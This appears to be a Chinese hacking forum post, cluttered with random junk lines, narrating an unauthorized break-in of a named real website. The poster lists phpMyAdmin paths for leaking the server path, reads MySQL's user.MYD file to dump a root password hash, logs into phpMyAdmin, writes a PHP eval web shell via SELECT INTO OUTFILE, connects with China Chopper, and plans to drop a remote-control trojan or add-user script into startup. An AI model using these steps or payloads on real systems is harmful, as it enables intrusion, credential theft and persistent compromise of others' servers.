3、magic_quotes_gpc()=OFF
- E% V) k8 v/ Q
! J* G; s5 F5 M; a/ j; t
试着爆绝对路径:
. C8 N) W/ Z5 L2 a
1./phpMyAdmin/index.php?lang[]=1
. }& e: \; c: a3 u- R* r
2./phpMyAdmin/phpinfo.php
' _9 T8 N% {& L) s- k
3./load_file()
1 P# _! l8 f9 f! H, u7 N* f4./phpmyadmin/themes/darkblue_orange/layout.inc.php
- O# _8 u* a' x+ |5./phpmyadmin/libraries/select_lang.lib.php
+ q: l8 n- ~( r3 K2 l1 v1 F6 `6./phpmyadmin/libraries/lect_lang.lib.php
?4 }1 R: L3 u1 ~. S# w7./phpmyadmin/libraries/mcrypt.lib.php
: q7 K1 n' c1 ?7 s+ x% i
8./phpmyadmin/libraries/export/xls.php
3 Z% W( [+ ^0 A
; a6 y* ~: g" i& Q均不行...........................
3 |/ Q f0 Z; q$ i6 O
- V; h) X4 V+ m; p8 l2 v
御剑扫到这个:
http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
" f' |; g7 R _! [, I
8 w' D1 |0 }7 v1 y# T权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
( {) [/ P2 {3 n- B4 ^3 L$ e( l
% r. O h, z5 k4 H" n5 a默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
3 O& `1 m Y4 [) C+ k. J
+ p4 Q$ z- z1 O5 F0 I1 y5 [敏感东西:
http://202.103.49.66/Admincp.php 社工进不去...........
- S3 R* x+ L( c
7 }# b% @ v0 Y2 @: L, ?想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
# ~; g! b/ @ n+ y5 V' x8 V2 ~' B4 k" e
1 }$ c/ W' X6 m( \- J- @, shttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
# f+ y# e" G( H% s: z4 D$ S4 I: N: l9 B( y) N: ^ f
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
4 h w7 B/ m1 w& l: U9 K
9 d* G- E/ k. u5 O H成功读到root密码:
6 ^* c) ]' Q, S0 z0 w
5 x0 _* a- C* m L; L, ^* f17---- r(0072)
; h0 o) r" d/ {" e5 j18---- o(006f)
4 X$ L6 u) }/ o$ Q6 g1 n
19---- o(006f)
6 u" W8 O, q Z) q7 l* |6 K
20---- t(0074)
9 }) K, t. S4 B& h7 O, S& Y( n9 k
21---- *(002a)
0 J: W; S3 t/ z9 ~5 J# n( L
22---- 8(0038)
. t7 _0 V# W6 s& ?+ b23---- 2(0032)
' h& C& }- Z# ]1 s- i# G2 D
24---- E(0045)
, T( x7 X2 F, c% ?; z
25---- 1(0031)
( F& w/ E! X) A( W# a
26---- C(0043)
8 R. U1 D i* l3 X; V27---- 5(0035)
2 P$ l! Y3 z& v. [* ~* @! K+ t28---- 8(0038)
. V& H" u Y+ A5 l3 k+ F( @1 |
29---- 2(0032)
4 g* M. p8 o& T1 A+ c
30---- 8(0038)
+ v) ~0 W0 \3 N3 t, [4 ~31---- A(0041)
- f% I; T T* T9 u9 O32---- 9(0039)
# y, ]8 p& _. V, y; @8 L: }/ ^33---- B(0042)
) t; M; k: m, x! W& g34---- 5(0035)
- {% k1 e/ ~/ u' R; w0 }- t
35---- 4(0034)
8 }( J' f, f- d5 m
36---- 8(0038)
9 p1 b8 b- J) _' N% ~& U7 [37---- 6(0036)
3 l! J/ v; {$ N4 O7 B2 S# [38---- 4(0034)
" K2 R( C. P# p" K6 A& l39---- 9(0039)
$ V0 H. l6 i* c9 W% o
40---- 1(0031)
% _% p, Y2 ]9 o: {' A* J1 ?$ S41---- 1(0031)
1 h- x9 _2 I- f
42---- 5(0035)
# k7 X4 T) N0 y) W5 ^; ]& k# y* a4 Y
43---- 3(0033)
. z* q* q0 \* e: {
44---- 5(0035)
' H7 G% q( Y: p& [" ~5 T- @
45---- 9(0039)
2 I7 e5 z: Y* ?% ~/ @1 W46---- 8(0038)
4 a% H8 [ H" W# Z2 t4 R; l+ b7 x* U2 H47---- F(0046)
1 c, j( l9 J. W8 r
48---- F(0046)
' Z: }. Z7 V2 Q& }9 e49---- 4(0034)
2 |% y8 b! x0 q
50---- F(0046)
4 z; n0 O0 Z. ?0 l6 {. _: U) g5 k51---- 0(0030)
$ z4 q5 n: j' r t* P0 u$ g2 I
52---- 3(0033)
: t8 P* l9 S! C53---- 2(0032)
& ?4 q; y" V$ r4 E/ {4 u4 B
54---- A(0041)
4 Q5 [2 I/ }% Y* |9 A
55---- 4(0034)
& Y& Z- v8 c% M' v; X( ]
56---- A(0041)
5 V3 \6 g7 O8 ^, W4 P4 o# L# a4 v
57---- B(0042)
6 j5 y( N9 `9 `. ?1 _: u% K# [1 V58---- *(0044)
" Q- e& b0 ?& o$ Q59---- *(0035)
! d/ }: E6 n; k* ~ C
60---- *(0041)
+ _* i& n( T, B7 T
61---- *0032)
9 }! O& ~3 |7 v2 @) d, r; W6 [
+ u7 t1 [. z2 l" \- ~, j6 O解密后成功登陆phpmyamin
4 D( ~* F( O' i, z, O
) ~5 W. v! J. z6 a9 s- W5 B* h
. _$ |1 `. I2 k( N& A$ \& N [attach]164[/attach]
B7 K6 n4 p3 h+ l, f9 c* [
$ o, q: m0 q" N0 d. r0 y( |
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
/ C- F/ ^1 |9 [
/ s5 j L# [0 p7 e$ \
成功执行,拿下shell,菜刀连接:
3 p# ]8 \7 o% ~# H2 u
- [& C& u* [0 k) b! N7 Y* P服务器不支持asp,aspx,php提权无果...................
6 b( d, B7 ~) h5 W2 K2 E- V
) a2 W* k8 a! ~8 n; }但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
6 y! ^ G& V0 B; a3 P* y. K3 A# m